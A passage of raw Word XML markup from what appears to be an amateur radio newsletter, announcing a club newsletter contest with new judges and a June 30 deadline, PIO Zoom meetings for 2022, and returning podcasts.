    <w:p w14:paraId="16DDEE20" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B04EF68" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Our contest represents the great talent we have…not only operators…but writers, story tellers, picture takers and their ability to share with us everything we do to help keep Amateur Radio alive and well. The club newsletters you read represent the very fabric of what Amateur Radio  is about and tracks the history…past, present and future…of our hobby and our efforts to make sure we are communicating in the very best way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676141F2" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192BC09A" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>This coming year will bring some changes to our contest. We’ll be adding three new judges to help keep a fresh eye on our work. They are professional PR practitioners, journalists in tune and in touch with the last trends in communications and media relations. Erin Cribbs will be returning to help us sort out all of the technical issues on layout and design and how our newsletters look on any screen in any format. We’ll have the profiles of the new judges next month and I’m sure you will be impressed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8885B3" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167DEEE2" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">As for the rules…pretty much the same. For your club to be officially entered you will need  to submit copies from  two different month’s to be eligible. How you submit them is important. Via email you can send a direct link to your newsletter, you can send a link your club’s webpage that contains a link your newsletter or you can mail them. As you know, because of the pandemic, for the past two years we have been judging the newsletters </w:t>
      </w:r>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>electronically. This has allowed for a more realistic look at the newsletters and gives the judges a better look at how they are actually viewed by your members. The deadline of entry is midnight June 30</w:t>
      </w:r>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>. The judges begin their work right after the July 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> holiday and the winners are announced in early August.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7842192F" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACD0C0C" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Our contest is the biggest and best in the country and there is no doubt we will continue to put our best right up front.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4753F875" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6F8102" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Good Luck!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB52821" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D1644F" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="222222"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ED42105" wp14:editId="63656EE4">
                <wp:extent cx="1362075" cy="771525"/>
                <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                <wp:docPr id="39" name="m_-7307863964954054467_x0000_i102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362075" cy="771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68BEC9" w14:textId="0855C67F" w:rsidR="001F0D5E" w:rsidRDefault="001F0D5E" w:rsidP="001F0D5E">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="455BFA11" wp14:editId="380C6A53">
                                  <wp:extent cx="1179195" cy="578485"/>
                                  <wp:effectExtent l="0" t="0" r="1905" b="0"/>
                                  <wp:docPr id="226" name="Picture 226"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picture containing text, clipart&#10;&#10;Description automatically generated"/>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179195" cy="57848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inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:rect w14:anchorId="7ED42105" id="m_-7307863964954054467_x0000_i1028" o:spid="_x0000_s1038" style="width:107.25pt;height:60.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" filled="f" stroked="f">
                <o:lock v:ext="edit" aspectratio="t"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0B68BEC9" w14:textId="0855C67F" w:rsidR="001F0D5E" w:rsidRDefault="001F0D5E" w:rsidP="001F0D5E">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="455BFA11" wp14:editId="380C6A53">
                            <wp:extent cx="1179195" cy="578485"/>
                            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
                            <wp:docPr id="226" name="Picture 226"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picture containing text, clipart&#10;&#10;Description automatically generated"/>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179195" cy="578485"/>
                                    </a:xfrm>
                                    <a:prstGeom prst="rect">
                                      <a:avLst/>
                                    </a:prstGeom>
                                    <a:noFill/>
                                    <a:ln>
                                      <a:noFill/>
                                    </a:ln>
                                  </pic:spPr>
                                </pic:pic>
                              </a:graphicData>
                            </a:graphic>
                          </wp:inline>
                        </w:drawing>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7302214F" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PIO ZOOM MEETING ON THE WAY ON FOR 2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C4C225" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E58D564" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Coming in 2022 will be our PIO ZOOM meetings. I have the software ready but Microsoft made a few updates to my system and added a few bugs that should be corrected soon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FF2FE6" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DD6AD6" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>My hope is that we can begin in late January and all PIO’s can find the time to join for some short discussions about our jobs, approaches and any issues that need attention. No real agenda just some good discussion and observations that might help us all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11587D3F" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC983C6" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Watch for the official notice and login procedures. Should be easy to log in and there will several different times available to accommodate everyone’s schedules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD10B02" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A041E4" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="222222"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="483828D8" wp14:editId="482AE1DD">
                <wp:extent cx="2524125" cy="1600200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="40" name="m_-7307863964954054467_x0000_i102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524125" cy="160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E75168" w14:textId="1DE1B1EF" w:rsidR="001F0D5E" w:rsidRDefault="001F0D5E" w:rsidP="001F0D5E">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D4AB0E6" wp14:editId="4903FE12">
                                  <wp:extent cx="2341245" cy="1486535"/>
                                  <wp:effectExtent l="0" t="0" r="1905" b="0"/>
                                  <wp:docPr id="227" name="Picture 22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Icon&#10;&#10;Description automatically generated"/>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341245" cy="148653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inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:rect w14:anchorId="483828D8" id="m_-7307863964954054467_x0000_i1027" o:spid="_x0000_s1039" style="width:198.75pt;height:12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" filled="f" stroked="f">
                <o:lock v:ext="edit" aspectratio="t"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5FE75168" w14:textId="1DE1B1EF" w:rsidR="001F0D5E" w:rsidRDefault="001F0D5E" w:rsidP="001F0D5E">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D4AB0E6" wp14:editId="4903FE12">
                            <wp:extent cx="2341245" cy="1486535"/>
                            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
                            <wp:docPr id="227" name="Picture 22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Icon&#10;&#10;Description automatically generated"/>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341245" cy="1486535"/>
                                    </a:xfrm>
                                    <a:prstGeom prst="rect">
                                      <a:avLst/>
                                    </a:prstGeom>
                                    <a:noFill/>
                                    <a:ln>
                                      <a:noFill/>
                                    </a:ln>
                                  </pic:spPr>
                                </pic:pic>
                              </a:graphicData>
                            </a:graphic>
                          </wp:inline>
                        </w:drawing>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0C8C8A" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48785343" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PIC PODCASTS RESUME IN 2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1F15F8" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029AA2C4" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Returning in 2022 will be the PIC PODCASTS!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0162DA40" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485B80B3" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>We did this a couple of years ago and the PODCASTS featured some great interviews with Amateur Radio operators and their stories. It allows them to tell us about their experiences in their own words.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79652D62" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398AF7F2" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Looks like right now the first one should be ready by February. You’ll be able to just click the  PODACAST ICON and listen right on your computer!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2356D5C2" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55533AF5" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7509ADC8" w14:textId="77777777" w:rsidR="00160CDC" w:rsidRPr="00160CDC" w:rsidRDefault="00160CDC" w:rsidP="00160CDC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160CDC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31F40E31" wp14:editId="603EE35A">
                <wp:extent cx="1771650" cy="628650"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="41" name="m_-7307863964954054467Picture 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71650" cy="628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2384E1" w14:textId="1708433D" w:rsidR="00FD6677" w:rsidRDefault="00FD6677" w:rsidP="00FD6677">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66828A52" wp14:editId="49DB5919">
                                  <wp:extent cx="1057932" cy="524933"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                                  <wp:docPr id="229" name="Picture 229" descr="A red square with white letter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red square with white letters&#10;&#10;Description automatically generated with low confidence"/>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081872" cy="536812"/>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inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:rect w14:anchorId="31F40E31" id="m_-7307863964954054467Picture 9" o:spid="_x0000_s1040" style="width:139.5pt;height:4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" filled="f" stroked="f">
                <o:lock v:ext="edit" aspectratio="t"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="712384E1" w14:textId="1708433D" w:rsidR="00FD6677" w:rsidRDefault="00FD6677" w:rsidP="00FD6677">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66828A52" wp14:editId="49DB5919">
                            <wp:extent cx="1057932" cy="524933"/>
                            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                            <wp:docPr id="229" name="Picture 229" descr="A red square with white letter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red square with white letters&#10;&#10;Description automatically generated with low confidence"/>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081872" cy="536812"/>
                                    </a:xfrm>
                                    <a:prstGeom prst="rect">
                                      <a:avLst/>
                                    </a:prstGeom>
                                    <a:noFill/>
                                    <a:ln>
                                      <a:noFill/>
                                    </a:ln>
                                  </pic:spPr>
